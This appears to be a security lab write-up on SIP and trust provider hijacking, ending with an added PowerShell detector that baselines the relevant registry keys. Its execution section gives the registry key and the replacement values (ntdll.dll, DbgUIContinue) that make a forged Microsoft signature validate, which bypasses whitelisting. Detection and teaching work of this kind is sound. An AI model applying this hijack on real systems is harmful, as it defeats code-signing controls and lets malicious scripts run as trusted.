SIP & Trust Provider Hijacking
Defense Evasion, Persistence, Whitelisting Bypass
In this lab, I will try to sign a simple "rogue" PowerShell script, test-forged.ps1, that contains only one line of code, with Microsoft's certificate, and so bypass any whitelisting protections/policies the script would be subject to if it were unsigned.

Execution

The script that I will try to sign:
Just before I start, let's make sure that the script is not signed, using the Get-AuthenticodeSignature cmdlet and Sysinternals sigcheck:
In order to sign the script with Microsoft's certificate, we first need to find a native, Microsoft-signed PowerShell script. I used PowerShell for this:
Get-ChildItem -Path C:\*.ps* -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "# SIG # Begin signature block"
I chose one script at random and simply checked whether it was signed; luckily it was:
type C:\Windows\WinSxS\x86_microsoft-windows-m..ell-cmdlets-modules_31bf3856ad364e35_10.0.16299.15_none_c7c20f51cd336675\Wdac.psd1
Let's copy the Microsoft signature block into my script:
Now let's modify the registry at:
HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
From its original values:
To:
Dll
C:\Windows\System32\ntdll.dll
FuncName
DbgUIContinue
Now let's launch a new PowerShell instance (so the registry changes take effect) and check the signature of the forged script. Note that it now shows as signed, verified and valid:

Observations

Monitoring the following registry keys/values (at minimum, the CryptSIPDllVerifyIndirectData key modified above) helps discover this suspicious activity:
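As an added example, not part of the original lab, here is a PowerShell script that snapshots every CryptSIPDll* registration under EncodingType 0, diffs it against a saved baseline, and flags the kind of change made above. The baseline file location and the heuristics in Test-SipRegistration are my own assumptions.

```powershell
# Added detection example (not from the original lab). Run once with -SaveBaseline on a
# known-good host, then periodically without it to report drift and suspicious entries.
param([switch]$SaveBaseline)

$SipRoot      = 'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0'
$BaselinePath = Join-Path $env:ProgramData 'sip-baseline.json'   # assumed location

function Get-SipRegistrations {
    # One record per {GUID} subkey of every CryptSIPDll* function key.
    Get-ChildItem -Path $SipRoot |
        Where-Object { $_.PSChildName -like 'CryptSIPDll*' } |
        ForEach-Object {
            $funcKey = $_.PSChildName
            Get-ChildItem -Path $_.PSPath | ForEach-Object {
                $p = Get-ItemProperty -Path $_.PSPath
                [pscustomobject]@{
                    Key      = "$funcKey\$($_.PSChildName)"
                    Dll      = [string]$p.Dll
                    FuncName = [string]$p.FuncName
                }
            }
        }
}

function Test-SipRegistration {
    param([pscustomobject]$Reg)
    $reasons = @()
    # Heuristic (assumption): the export behind a VerifyIndirectData key normally has
    # "Verify" in its name; ntdll!DbgUIContinue, as used in this lab, does not.
    if ($Reg.Key -like 'CryptSIPDllVerifyIndirectData\*' -and $Reg.FuncName -notmatch 'Verify') {
        $reasons += "unexpected FuncName '$($Reg.FuncName)'"
    }
    # Heuristic (assumption): no legitimate SIP is implemented in ntdll.dll.
    if ([IO.Path]::GetFileName($Reg.Dll) -ieq 'ntdll.dll') { $reasons += 'Dll is ntdll.dll' }
    $reasons
}

$current = @(Get-SipRegistrations)
if ($SaveBaseline) { $current | ConvertTo-Json | Set-Content -Path $BaselinePath; return }

$baseline = @{}
if (Test-Path $BaselinePath) {
    foreach ($b in (Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json)) { $baseline[$b.Key] = $b }
}
foreach ($r in $current) {
    $b = $baseline[$r.Key]
    if ($b -and ($b.Dll -ne $r.Dll -or $b.FuncName -ne $r.FuncName)) {
        Write-Warning "$($r.Key) changed: $($b.Dll)!$($b.FuncName) -> $($r.Dll)!$($r.FuncName)"
    }
    foreach ($why in Test-SipRegistration -Reg $r) { Write-Warning "$($r.Key): $why" }
}
```

Against the change made in this lab it reports both a baseline drift and the two heuristic hits for the {603BCC1F-...} entry; extend the baseline to the trust-provider keys listed in the whitepaper below for full coverage.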

References

For all the registry keys/values that should be used as a baseline, please refer to the original research whitepaper by Matt Graeber: SpecterOps, Subverting Trust in Windows
Subvert Trust Controls: SIP and Trust Provider Hijacking, Sub-technique T1553.003 - Enterprise | MITRE ATT&CK
Hijacking Digital Signatures (Penetration Testing Lab)
Unable to renew certificate via internal Microsoft certificate authority
Walkthrough: Request a Digital Certificate from Certificate Server or create a testing Digital Certificate to sign a Package (Microsoft Docs)
Signing PowerShell Scripts (Scott Hanselman)
GitHub - netbiosX/Digital-Signature-Hijack: Binaries, PowerShell scripts and information about Digital Signature Hijacking